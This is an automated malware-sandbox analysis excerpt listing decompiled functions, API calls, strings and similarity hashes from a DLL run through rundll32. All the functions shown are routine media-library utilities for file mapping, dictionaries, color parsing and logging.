Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: strlen$mv_freepmv_strdup$_aligned_reallocmv_dict_getmv_malloczmv_reallocmv_realloc_array
String ID: $%lld
API String ID: 420417855-3617178099
Opcode ID: c3b2448d299c3e7ec0f0b399289f88982a6b045d30e820103abfaa4dec61d1d3
Instruction ID: 8f6e5ec8c3f0a619e422cb1a926671cc568e29337de09296a572835a12694a18
Opcode Fuzzy Hash: c3b2448d299c3e7ec0f0b399289f88982a6b045d30e820103abfaa4dec61d1d3
Instruction Fuzzy Hash: 539117B59097458FC754DF68C18066EBBE0FF88380F56892DED889B341DB74E880CB42

Uniqueness

Uniqueness Score: -1.00%

Function 100192E0 Relevance: 38.6, APIs: 18, Strings: 4, Instructions: 150fileCOMMON

Download Yara Rule

APIs

mvpriv_open.F086 ref: 1001933F

Part of subcall function 100195E0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10019633
Part of subcall function 100195E0: mv_calloc.F086 ref: 1001964E
Part of subcall function 100195E0: MultiByteToWideChar.KERNEL32 ref: 10019685
Part of subcall function 100195E0: mv_calloc.F086 ref: 100196D7
Part of subcall function 100195E0: mv_freep.F086 ref: 10019713
Part of subcall function 100195E0: wcslen.MSVCRT ref: 1001971F
Part of subcall function 100195E0: _wsopen.MSVCRT ref: 1001974B

_fstat64.MSVCRT ref: 10019366
_close.MSVCRT ref: 10019394
_get_osfhandle.MSVCRT ref: 100193C5
CreateFileMappingA.KERNEL32 ref: 100193ED
MapViewOfFile.KERNEL32 ref: 10019422
CloseHandle.KERNEL32 ref: 10019434
mv_log.F086 ref: 1001945D
_close.MSVCRT ref: 10019465
_errno.MSVCRT ref: 10019480
mv_strerror.F086 ref: 100194A1
mv_log.F086 ref: 100194C7
_errno.MSVCRT ref: 100194D8
mv_strerror.F086 ref: 100194FE
mv_log.F086 ref: 1001951B
_close.MSVCRT ref: 10019523
mv_log.F086 ref: 1001954F
_close.MSVCRT ref: 10019557

Strings

Error occurred in CreateFileMapping(), xrefs: 10019561
Cannot read file '%s': %s, xrefs: 100194A6
Error occurred in fstat(): %s, xrefs: 1001950B
File size for file '%s' is too big, xrefs: 10019535

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _closemv_log$ByteCharFileMultiWide_errnomv_callocmv_strerror$CloseCreateHandleMappingView_fstat64_get_osfhandle_wsopenmv_freepmvpriv_openwcslen
String ID: Cannot read file '%s': %s$Error occurred in CreateFileMapping()$Error occurred in fstat(): %s$File size for file '%s' is too big
API String ID: 2213036534-2445208470
Opcode ID: f3d6b5768689cfe5005ee31c4e5cc66ead5e4a9d6eb64f32d910fd6e1a6354d1
Instruction ID: a1ac4bca67f905ea7eb530c9fec20e9fe0d2cf07c5fae6ebec99be3d32fbbfc6
Opcode Fuzzy Hash: f3d6b5768689cfe5005ee31c4e5cc66ead5e4a9d6eb64f32d910fd6e1a6354d1
Instruction Fuzzy Hash: 8561BDB59097459FC310DF29C48429EBBE4FF88710F51892EE8D98B350EB78D9808F82

Uniqueness

Uniqueness Score: -1.00%

Function 1002C1F4 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 221COMMON

Download Yara Rule

APIs

mv_freep.F086 ref: 1002C1FC
mv_freep.F086 ref: 1002C208
mv_freep.F086 ref: 1002C241
mv_freep.F086 ref: 1002C24D
mv_log.F086 ref: 1002C29B

Strings

%lld, xrefs: 1002C396
%d/%d, xrefs: 1002C5AB
(default , xrefs: 1002C282
%-15s , xrefs: 1002BDF4
"%s", xrefs: 1002C2CF

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_freep$mv_log
String ID: %-15s $ (default $"%s"$%d/%d$%lld
API String ID: 2749705325-3616743394
Opcode ID: 980a76943a0335aee30f922a9d190d9bdb0ce562017a62854cf0290bc96f8399
Instruction ID: e291881e513b933ead242bebe0381d4369face5adc3570e656dab592c6f763c7
Opcode Fuzzy Hash: 980a76943a0335aee30f922a9d190d9bdb0ce562017a62854cf0290bc96f8399
Instruction Fuzzy Hash: D591A278A08B458FC750DF68D580A5EBBE1FF89390F91892EF99987311E774E841CB42

Uniqueness

Uniqueness Score: -1.00%

Function 10031420 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 199stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 10031468
mv_strlcpy.F086 ref: 1003148B
strchr.MSVCRT ref: 1003149C
strlen.MSVCRT ref: 100314B6
mv_strcasecmp.F086 ref: 100314CF
mv_strcasecmp.F086 ref: 100314E4
mv_get_random_seed.F086 ref: 100314F1
strtoul.MSVCRT ref: 10031526

Strings

Invalid 0xRRGGBB[AA] color string: '%s', xrefs: 10031717
0123456789ABCDEFabcdef, xrefs: 100315EB
bikeshed, xrefs: 100314DB
Invalid alpha value specifier '%s' in '%s', xrefs: 100316E4
random, xrefs: 100314C6

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_strcasecmpstrlen$mv_get_random_seedmv_strlcpystrchrstrtoul
String ID: 0123456789ABCDEFabcdef$Invalid 0xRRGGBB[AA] color string: '%s'$Invalid alpha value specifier '%s' in '%s'$bikeshed$random
API String ID: 887406882-1143575717
Opcode ID: c0171da440a50a3ac54d9c683c706d3676e2163e985c2b92080aa2cb108a1475
Instruction ID: 8bd814382b19517d639cc9fd4417e09b44f3e243961e33b67ed5873bedcaf9bd
Opcode Fuzzy Hash: c0171da440a50a3ac54d9c683c706d3676e2163e985c2b92080aa2cb108a1475
Instruction Fuzzy Hash: 0F817A749087859ED342DF78C48129EBBF4EF89381F55CA2EE4C99B251E734D880DB52

Uniqueness

Uniqueness Score: -1.00%

Function 10011210 Relevance: 30.2, APIs: 20, Instructions: 223
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E10011210(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr __ebp, signed int _a4, signed int _a8, void* _a12, signed int _a16) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v32;
				void* _v36;
				int _v48;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _t94;
				signed int* _t95;
				signed int _t101;
				signed int _t102;
				signed int _t104;
				signed int _t106;
				int _t108;
				int _t109;
				int _t111;
				signed int* _t118;
				int _t122;
				signed int _t123;
				int _t126;
				signed int _t127;
				signed int* _t130;
				int _t133;
				signed int _t134;
				void _t136;
				signed int _t138;
				void* _t142;
				signed int _t146;
				void* _t147;
				signed int _t149;
				signed int _t150;
				int _t153;
				void* _t154;
				signed int* _t157;
				signed int* _t158;

				_v8 = __edi;
				_v16 = __ebx;
				_t138 = _a16;
				_v12 = __esi;
				_t146 = _a8;
				_v4 = __ebp;
				_t118 =  *_a4;
				_v36 = 0;
				_v32 = 0;
				if((_t138 & 0x00000008) == 0) {
					if(_a12 == 0) {
						goto L2;
					}
					 *_t158 = _a12;
					_v32 = E100292E0(_t118, _t138, _t146, __ebp);
					if(_t146 != 0) {
						goto L3;
					}
					goto L22;
				} else {
					_v32 = _a12;
					L2:
					if(_t146 == 0) {
						L22:
						_t147 = 0xffffffea;
						L23:
						if(_t118 == 0) {
							L10:
							 *_t158 = _v36;
							L100290D0();
							 *_t158 = _v32;
							L100290D0();
							L11:
							return _t147;
						}
						L9:
						if( *_t118 == 0) {
							 *_t158 =  &(_t118[1]);
							E100290E0();
							 *_t158 = _a4;
							E100290E0();
						}
						goto L10;
					}
					L3:
					_t157 = 0;
					if((_t138 & 0x00000040) == 0) {
						_v64 = _t138;
						_v68 = 0;
						_v72 = _t146;
						 *_t158 = _t118;
						_t157 = E100110D0();
					}
					if((_t138 & 0x00000004) == 0) {
						 *_t158 = _t146;
						_t94 = E100292E0(_t118, _t138, _t146, _t157);
						_v36 = _t94;
						_t149 = _t94;
						if(_t118 == 0) {
							goto L29;
						}
						if(_t94 == 0) {
							goto L8;
						}
						goto L6;
					} else {
						_v36 = _t146;
						if(_t118 == 0) {
							L29:
							 *_t158 = 8;
							_t95 = E10029100();
							_t149 = _v36;
							_t118 = _t95;
							 *_a4 = _t118;
							if(_t118 == 0 || _t149 == 0) {
								_t147 = 0xfffffff4;
								goto L23;
							} else {
								goto L6;
							}
						}
						L6:
						_t122 = _v32;
						if(_a12 == 0 || _t122 != 0) {
							if(_t157 == 0) {
								_t150 =  *_t118;
								if(_t122 == 0) {
									L37:
									if(_t150 == 0) {
										 *_t158 =  &(_t118[1]);
										E100290E0();
										 *_t158 = _a4;
										E100290E0();
									}
									_t147 = 0;
									 *_t158 =  &_v36;
									E100290E0();
									goto L11;
								}
								_v68 = 8;
								_v72 = _t150 + 1;
								 *_t158 = _t118[1];
								_t101 = E10029010();
								_t123 = _t101;
								if(_t101 == 0) {
									goto L8;
								}
								_t118[1] = _t101;
								_t150 =  *_t118;
								L18:
								_t102 = _v32;
								if(_t102 == 0) {
									goto L37;
								}
								_t130 = _t123 + _t150 * 8;
								_t130[1] = _t102;
								 *_t130 = _v36;
								 *_t118 = _t150 + 1;
								_t147 = 0;
								goto L11;
							}
							if((_t138 & 0x00000010) != 0) {
								 *_t158 = _t149;
								_t147 = 0;
								L100290D0();
								 *_t158 = _v32;
								L100290D0();
								goto L11;
							}
							_t104 = _a4;
							if(_t122 == 0 || (_t138 & 0x00000020) == 0) {
								 *_t158 = _t104;
								L100290D0();
								goto L17;
							} else {
								 *_t158 = _t104;
								_v48 = _t122;
								_t108 = strlen(??);
								 *_t158 = _v48;
								_t153 = _t108;
								_t109 = strlen(??);
								 *_t158 = _t104;
								_v48 = _t109;
								_t63 = _t109 + 1; // 0x1
								_v72 = _t153 + _t63;
								_t111 = L10028DA0();
								if(_t111 == 0) {
									goto L8;
								}
								_t133 = _v48;
								_t142 = _t111 + _t153;
								_t154 = _v32;
								_t126 = _t133 + 1;
								if(_t126 >= 8) {
									if((_t142 & 0x00000001) != 0) {
										_t127 =  *_t154 & 0x000000ff;
										_t142 = _t142 + 1;
										_t154 = _t154 + 1;
										 *(_t142 - 1) = _t127;
										_t126 = _t133;
									}
									if((_t142 & 0x00000002) != 0) {
										_t134 =  *_t154 & 0x0000ffff;
										_t142 = _t142 + 2;
										_t154 = _t154 + 2;
										_t126 = _t126 - 2;
										 *(_t142 - 2) = _t134;
									}
									if((_t142 & 0x00000004) != 0) {
										_t136 =  *_t154;
										_t142 = _t142 + 4;
										_t154 = _t154 + 4;
										_t126 = _t126 - 4;
										 *(_t142 - 4) = _t136;
									}
								}
								_v48 = _t111;
								memcpy(_t142, _t154, _t126);
								_t158 =  &(_t158[3]);
								 *_t158 =  &_v32;
								E100290E0();
								_v32 = _v48;
								L17:
								 *_t158 =  *_t157;
								L100290D0();
								_t106 =  *_t118;
								_t123 = _t118[1];
								_t31 = _t106 - 1; // -1
								_t150 = _t31;
								 *_t118 = _t150;
								 *_t157 =  *(_t123 + _t150 * 8);
								_a4 =  *(_t123 + 4 + _t150 * 8);
								goto L18;
							}
						} else {
							L8:
							_t147 = 0xfffffff4;
							goto L9;
						}
					}
				}
			}

0x10011213
0x1001121b
0x1001121f
0x10011223
0x10011227
0x1001122b
0x1001122f
0x10011233
0x1001123f
0x10011243
0x10011346
0x00000000
0x00000000
0x10011350
0x1001135a
0x1001135e
0x00000000
0x00000000
0x00000000
0x10011249
0x1001124d
0x10011251
0x10011253
0x10011364
0x10011364
0x10011369
0x1001136b
0x1001129e
0x100112a2
0x100112a5
0x100112ae
0x100112b1
0x100112b6
0x100112cb
0x100112cb
0x10011294
0x10011298
0x10011413
0x10011416
0x1001141f
0x10011422
0x10011422
0x00000000
0x10011298
0x10011259
0x10011259
0x10011261
0x100113a0
0x100113a6
0x100113aa
0x100113ae
0x100113b6
0x100113b6
0x1001126d
0x10011380
0x10011383
0x1001138a
0x1001138e
0x10011390
0x00000000
0x00000000
0x10011394
0x00000000
0x00000000
0x00000000
0x10011273
0x10011273
0x10011279
0x100113c0
0x100113c0
0x100113c7
0x100113cc
0x100113d0
0x100113d8
0x100113da
0x100113e4
0x00000000
0x00000000
0x00000000
0x00000000
0x100113da
0x1001127f
0x10011283
0x10011289
0x100112d2
0x10011432
0x10011434
0x10011468
0x1001146a
0x100114fb
0x100114fe
0x10011507
0x1001150a
0x1001150a
0x10011474
0x10011476
0x10011479
0x00000000
0x10011479
0x1001143c
0x10011440
0x10011447
0x1001144a
0x10011451
0x10011453
0x00000000
0x00000000
0x10011459
0x1001145c
0x1001131e
0x1001131e
0x10011324
0x00000000
0x00000000
0x1001132a
0x10011332
0x10011335
0x10011337
0x10011339
0x00000000
0x10011339
0x100112de
0x100113f0
0x100113f3
0x100113f5
0x100113fe
0x10011401
0x00000000
0x10011401
0x100112e6
0x100112e9
0x100112f4
0x100112f7
0x00000000
0x10011488
0x10011488
0x1001148d
0x10011491
0x1001149a
0x1001149d
0x1001149f
0x100114a4
0x100114a9
0x100114ad
0x100114b1
0x100114b5
0x100114bc
0x00000000
0x00000000
0x100114c2
0x100114c6
0x100114c9
0x100114cd
0x100114d3
0x1001151e
0x10011540
0x10011543
0x10011544
0x10011545
0x10011548
0x10011548
0x10011526
0x1001154c
0x1001154f
0x10011552
0x10011555
0x10011558
0x10011558
0x1001152e
0x10011530
0x10011532
0x10011535
0x10011538
0x1001153b
0x1001153b
0x1001152e
0x100114d5
0x100114dd
0x100114dd
0x100114df
0x100114e2
0x100114eb
0x100112fc
0x100112ff
0x10011302
0x10011307
0x10011309
0x1001130c
0x1001130c
0x1001130f
0x10011318
0x1001131b
0x00000000
0x1001131b
0x1001128f
0x1001128f
0x1001128f
0x00000000
0x1001128f
0x10011289
0x1001126d

APIs

mv_strdup.F086 ref: 10011353
mv_strdup.F086 ref: 10011383
mv_dict_get.F086 ref: 100113B1
mv_mallocz.F086 ref: 100113C7

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_strdup$mv_dict_getmv_mallocz
String ID:
API String ID: 3834523185-0
Opcode ID: 92e61786e18b3758c0339e56a8e0c00a76c00a96181e52d74e44f6f1d6311550
Instruction ID: 56232f5dd71c1c11c53de360d97ca929451fd6b060f0d926ddb83f3af19d46ac
Opcode Fuzzy Hash: 92e61786e18b3758c0339e56a8e0c00a76c00a96181e52d74e44f6f1d6311550
Instruction Fuzzy Hash: 2E9127B5A087158FC754DF68C08065EBBE1EF98790F52892DED999B340E770E981CB82

Uniqueness

Uniqueness Score: -1.00%

Function 10026250 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 193
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E10026250() {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t100;
				signed int _t104;
				void* _t108;
				char* _t112;
				intOrPtr _t127;
				char* _t128;
				void* _t131;
				char* _t132;
				signed int _t136;
				signed int _t138;
				void* _t139;
				signed int _t141;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int _t149;
				signed int _t152;
				signed int _t155;
				signed int _t158;
				signed int _t161;
				signed int _t162;
				signed int _t164;
				signed int _t166;
				void* _t167;
				signed int* _t168;

				_t168 = _t167 - L100918A0(0x103c);
				_t136 = _t168[0x414];
				if(_t136 == 0) {
					_t168[2] = 1;
					 *_t168 =  &(_t168[0xc]);
					_t168[1] = 0;
					L10008880(0, 0, 1, 1);
					_t168[2] = 1;
					_t161 =  &(_t168[0x20c]);
					_t168[1] = 0;
					_t158 =  &(_t168[0x30c]);
					 *_t168 =  &(_t168[0x10c]);
					L10008880(0, _t158, _t161, 1);
					_t168[1] = 0;
					_t168[2] = 1;
					 *_t168 = _t161;
					L10008880(0, _t158, _t161, 1);
					_t168[2] = 0x10000;
					_t168[1] = 0;
					 *_t168 = _t158;
					L10008880(0, _t158, _t161, 1);
					_t100 =  *(_t168[0x41a]) & 0xffffff00 |  *(_t168[0x41a]) != 0x00000000;
					L8:
					if(_t168[0x415] >= 0xfffffff9 && _t100 != 0 && ( *0x100d76ac & 0x00000002) != 0) {
						_t67 = _t168[0x415] + 8; // 0x101
						_t152 = _t67;
						_t112 = 0x100b6d3b;
						if(_t152 <= 0x40) {
							_t112 =  *(0x100b6f40 + _t152 * 4);
						}
						_t168[2] = _t112;
						_t168[1] = "[%s] ";
						 *_t168 = _t161;
						L100089C0();
					}
					 *_t168 = _t158;
					_t168[2] = _t168[0x417];
					_t168[1] = _t168[0x416];
					L10008B70();
					_t104 = _t168[0xc];
					_t141 = _t168[0x10c];
					_t162 = _t168[0x20c];
					_t138 = _t168[0x30c];
					if( *_t104 != 0 ||  *_t141 != 0 ||  *_t162 != 0) {
						L12:
						_t164 = _t168[0x30d];
						_t147 = 0;
						if(_t164 != 0 && _t168[0x30e] >= _t164) {
							_t149 =  *(_t138 + _t164 - 1) & 0x000000ff;
							_t168[0xa] = _t149 == 0xa;
							_t147 = (_t149 & 0xffffff00 | _t149 == 0x0000000d | _t168[0xa]) & 0x000000ff;
						}
						 *(_t168[0x41a]) = _t147;
						goto L16;
					} else {
						if( *_t138 == 0) {
							L16:
							_t168[3] = _t104;
							_t168[2] = "%s%s%s%s";
							_t168[6] = _t138;
							_t168[5] = _t162;
							_t168[4] = _t141;
							_t168[1] = _t168[0x419];
							 *_t168 = _t168[0x418];
							_t108 = L10025AE0();
							 *_t168 = _t158;
							_t168[1] = 0;
							_t139 = _t108;
							E10009690(_t139, _t141, _t158, _t162);
							return _t139;
						}
						goto L12;
					}
				}
				_t168[2] = 1;
				_t166 =  &(_t168[0x10c]);
				_t168[1] = 0;
				 *_t168 =  &(_t168[0xc]);
				_t161 =  &(_t168[0x20c]);
				_t168[0xa] =  *_t136;
				L10008880(_t136, 0x10000, _t161, _t166);
				_t168[2] = 1;
				_t168[1] = 0;
				 *_t168 = _t166;
				L10008880(_t136, 0x10000, _t161, _t166);
				_t168[2] = 1;
				_t168[1] = 0;
				 *_t168 = _t161;
				L10008880(_t136, 0x10000, _t161, _t166);
				_t168[2] = 0x10000;
				_t158 =  &(_t168[0x30c]);
				_t168[1] = 0;
				 *_t168 = _t158;
				L10008880(_t136, _t158, _t161, _t166);
				_t155 = _t168[0xa];
				_t143 = 0 |  *(_t168[0x41a]) != 0x00000000;
				_t100 = _t143;
				if(_t155 != 0 && _t143 != 0) {
					_t127 =  *((intOrPtr*)(_t155 + 0x14));
					if(_t127 != 0) {
						_t145 =  *(_t136 + _t127);
						if(_t145 != 0) {
							_t131 =  *_t145;
							if(_t131 != 0) {
								 *_t168 = _t145;
								_t168[0xb] = _t155;
								_t168[0xa] = _t145;
								_t132 =  *((intOrPtr*)(_t131 + 4))();
								_t168[3] = _t168[0xa];
								_t168[2] = _t132;
								_t168[1] = "[%s @ %p] ";
								 *_t168 =  &(_t168[0xc]);
								L100089C0();
								_t155 = _t168[0xb];
							}
						}
					}
					 *_t168 = _t136;
					_t128 =  *((intOrPtr*)(_t155 + 4))();
					_t168[3] = _t136;
					_t168[1] = "[%s @ %p] ";
					 *_t168 = _t166;
					_t168[2] = _t128;
					L100089C0();
					_t100 = _t168[0x41a] & 0xffffff00 |  *(_t168[0x41a]) != 0x00000000;
				}
			}

0x1002625e
0x10026260
0x10026269
0x100264c7
0x100264d1
0x100264de
0x100264e2
0x100264ee
0x100264f2
0x100264f9
0x100264fd
0x10026504
0x10026507
0x1002650e
0x10026512
0x10026516
0x10026519
0x10026523
0x10026529
0x1002652d
0x10026530
0x10026540
0x1002637a
0x10026382
0x1002648c
0x1002648c
0x1002648f
0x10026497
0x10026499
0x10026499
0x100264a0
0x100264a9
0x100264ad
0x100264b0
0x100264b0
0x1002638c
0x10026396
0x100263a1
0x100263a5
0x100263aa
0x100263ae
0x100263b5
0x100263bc
0x100263c6
0x100263d1
0x100263d1
0x100263d8
0x100263dc
0x100263e7
0x100263ef
0x100263fe
0x100263fe
0x10026408
0x00000000
0x10026469
0x1002646c
0x1002640b
0x1002640b
0x10026414
0x1002641f
0x10026423
0x10026427
0x1002642b
0x10026436
0x10026439
0x10026440
0x10026443
0x10026447
0x10026449
0x1002645a
0x1002645a
0x00000000
0x10026470
0x100263c6
0x1002627b
0x1002627f
0x10026288
0x10026290
0x10026293
0x1002629a
0x1002629e
0x100262a8
0x100262ae
0x100262b2
0x100262b5
0x100262c1
0x100262c5
0x100262c9
0x100262cc
0x100262d3
0x100262d7
0x100262de
0x100262e2
0x100262e5
0x100262f1
0x100262f9
0x100262fe
0x10026300
0x10026306
0x1002630b
0x1002630d
0x10026312
0x10026314
0x10026318
0x1002631a
0x1002631d
0x10026321
0x10026325
0x1002632c
0x10026330
0x10026339
0x10026341
0x10026344
0x10026349
0x10026349
0x10026318
0x10026312
0x1002634d
0x10026350
0x10026358
0x1002635c
0x10026360
0x10026363
0x10026367
0x10026377
0x10026377

APIs

mv_bprint_init.F086 ref: 1002629E
mv_bprint_init.F086 ref: 100262B5
mv_bprint_init.F086 ref: 100262CC
mv_bprint_init.F086 ref: 100262E5
mv_bprintf.F086 ref: 10026344
mv_bprintf.F086 ref: 10026367
mv_vbprintf.F086 ref: 100263A5
mv_bprint_finalize.F086 ref: 10026449
mv_bprint_init.F086 ref: 100264E2
mv_bprint_init.F086 ref: 10026507
mv_bprint_init.F086 ref: 10026519
mv_bprint_init.F086 ref: 10026530

Strings

[%s @ %p] , xrefs: 10026334, 10026353
%s%s%s%s, xrefs: 1002640F
[%s] , xrefs: 100264A4

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_init$mv_bprintf$mv_bprint_finalizemv_vbprintf
String ID: %s%s%s%s$[%s @ %p] $[%s]
API String ID: 2514531573-1798253436
Opcode ID: 3f2bd632272b9df47179aee3b67c56da7bd7b79c66d3fadd9b491fc2fadde794
Instruction ID: c71d304a02298176911f7b5d9492a31840536d8b4fe4b07b2d7bce997b72d9a0
Opcode Fuzzy Hash: 3f2bd632272b9df47179aee3b67c56da7bd7b79c66d3fadd9b491fc2fadde794
Instruction Fuzzy Hash: 808119B49097809FD350DF28D48069FBBE1FF88340F85892EE8C887355DB75AA84CB42

Uniqueness

Uniqueness Score: -1.00%

Function 100202B0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 171COMMON

Download Yara Rule

APIs

mv_get_pix_fmt_name.F086 ref: 10020395
mv_log.F086 ref: 100203B3
mv_log.F086 ref: 100203D6
mv_log.F086 ref: 100203FD

Strings

Error creating an internal frame pool, xrefs: 100203C6
Failed to open device handle, xrefs: 10020522
Unsupported pixel format: %s, xrefs: 100203A1
P010, xrefs: 100204BE
NV12, xrefs: 1002040C
Unknown surface type: %lu, xrefs: 100203E8

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_log$mv_get_pix_fmt_name
String ID: Error creating an internal frame pool$Failed to open device handle$NV12$P010$Unknown surface type: %lu$Unsupported pixel format: %s
API String ID: 2830795485-4196069199
Opcode ID: 7e434e73dff374732bf92a6c6b461502dd5c9fdd604f663b4050518d1b8bf5f6
Instruction ID: dbfc9fc73534cf50ff89b72e71a8ef33aba9b4af1470f45bc046c89c466e1acb
Opcode Fuzzy Hash: 7e434e73dff374732bf92a6c6b461502dd5c9fdd604f663b4050518d1b8bf5f6
Instruction Fuzzy Hash: 3371C2B46087459FC750DF29D58460ABBE1FF88300F91C96EF9998B356E774E840DB42

Uniqueness

Uniqueness Score: -1.00%

